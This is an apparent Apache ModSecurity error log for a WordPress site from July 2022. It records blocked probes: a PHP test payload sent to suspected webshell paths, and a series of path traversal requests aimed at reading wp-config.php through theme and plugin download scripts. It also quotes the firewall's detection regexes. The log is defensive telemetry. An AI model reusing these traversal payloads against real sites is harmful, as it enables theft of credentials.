"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/class-wp-page-icon.php"] [unique_id "YtkoBQG5q-nz3udSQ8ry6wAAAE4"] [Thu Jul 21 05:18:53.282418 2022] [:error] [pid 15071:tid 139905975924480] [client 193.201.9.12:60050] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/class-wp-page-icon.php"] [unique_id "YtkoDQG5q-nz3udSQ8ry7AAAAE8"] [Thu Jul 21 09:27:59.373699 2022] [autoindex:error] [pid 15070:tid 139906068244224] [client 20.39.191.252:37458] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 21 09:46:52.056221 2022] [autoindex:error] [pid 15699:tid 139906059851520] [client 20.65.62.67:37924] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Thu Jul 21 16:05:55.386044 2022] [autoindex:error] [pid 29708:tid 139941760714496] [client 158.69.23.79:45876] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jul 21 21:05:40.942584 2022] [:error] [pid 29708:tid 139941585585920] [client 193.201.9.12:52540] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/license.php"] [unique_id "YtoF9ESpDLQn0LZ14uiIbAAAAE4"] [Thu Jul 21 21:05:46.796631 2022] [:error] [pid 29708:tid 139941535229696] [client 193.201.9.12:52542] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/license.php"] [unique_id "YtoF-kSpDLQn0LZ14uiIbQAAAFQ"] [Thu Jul 21 21:05:51.943454 2022] [:error] [pid 29708:tid 139941518444288] [client 193.201.9.12:52544] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/license.php"] [unique_id "YtoF_0SpDLQn0LZ14uiIbgAAAFY"] [Fri Jul 22 11:15:26.544079 2022] [:error] [pid 22471:tid 140017041094400] [client 193.201.9.12:41100] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/sistem.php"] [unique_id "YtrNHuCtYZwatdwcM8WpcQAAAEw"] [Fri Jul 22 11:15:31.755057 2022] [:error] [pid 22472:tid 140017141806848] [client 193.201.9.12:41102] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/sistem.php"] [unique_id "YtrNIypbG8_UBGXeM63uGgAAAIA"] [Fri Jul 22 11:15:38.869138 2022] [:error] [pid 22472:tid 140017125021440] [client 193.201.9.12:41104] [client 193.201.9.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/sistem.php"] [unique_id "YtrNKipbG8_UBGXeM63uGwAAAII"] [Fri Jul 22 16:53:22.157864 2022] [:error] [pid 22470:tid 140017125021440] [client 72.11.157.116:51266] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/down.php"] [unique_id "YtscUnxqqtgWgIAXsGFhYAAAAAI"] [Fri Jul 22 16:53:22.247784 2022] [:error] [pid 22470:tid 140017108236032] [client 72.11.157.116:51268] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download.php"] [unique_id "YtscUnxqqtgWgIAXsGFhYQAAAAQ"] [Fri Jul 22 16:53:22.337429 2022] [:error] [pid 22470:tid 140017099843328] [client 72.11.157.116:51270] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download/download.php"] [unique_id "YtscUnxqqtgWgIAXsGFhYgAAAAU"] [Fri Jul 22 16:53:22.427371 2022] [:error] [pid 22470:tid 140016973952768] [client 72.11.157.116:51272] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/inc/download.php"] [unique_id "YtscUnxqqtgWgIAXsGFhYwAAABQ"] [Fri Jul 22 16:53:22.519519 2022] [:error] [pid 22471:tid 140017049487104] [client 72.11.157.116:51274] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/includes/view-pdf.php"] [unique_id "YtscUuCtYZwatdwcM8WquwAAAEs"] [Fri Jul 22 16:53:22.610354 2022] [:error] [pid 23081:tid 140016999130880] [client 72.11.157.116:51276] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/lib/scripts/download.php"] [unique_id "YtscUnhurfgLch3PImzH2QAAANE"] [Fri Jul 22 16:53:22.700002 2022] [:error] [pid 22471:tid 140017024308992] [client 72.11.157.116:51278] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/includes/download.php"] [unique_id "YtscUuCtYZwatdwcM8WqvAAAAE4"] [Fri Jul 22 16:53:22.789451 2022] [:error] [pid 23081:tid 140017049487104] [client 72.11.157.116:51280] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/lib/downloadlink.php"] [unique_id "YtscUnhurfgLch3PImzH2gAAAMs"] [Fri Jul 22 16:53:22.893191 2022] [:error] [pid 22472:tid 140017141806848] [client 72.11.157.116:51282] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/functions/download.php"] [unique_id "YtscUipbG8_UBGXeM63wpQAAAIA"] [Fri Jul 22 16:53:22.983470 2022] [:error] [pid 22472:tid 140017049487104] [client 72.11.157.116:51284] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download.php"] [unique_id "YtscUipbG8_UBGXeM63wpgAAAIs"] [Fri Jul 22 16:53:23.073128 2022] [:error] [pid 23081:tid 140017125021440] [client 72.11.157.116:51286] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/css/css.php"] [unique_id "YtscU3hurfgLch3PImzH2wAAAMI"] [Fri Jul 22 16:53:23.163260 2022] [:error] [pid 23081:tid 140017083057920] [client 72.11.157.116:51288] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/framework/utilities/download/getfile.php"] [unique_id "YtscU3hurfgLch3PImzH3AAAAMc"] [Fri Jul 22 16:53:35.439528 2022] [:error] [pid 23081:tid 140017057879808] [client 72.11.157.116:51342] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive.php"] [unique_id "YtscX3hurfgLch3PImzH4wAAAMo"] [Fri Jul 22 16:53:35.544367 2022] [:error] [pid 22471:tid 140017116628736] [client 72.11.157.116:51344] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: 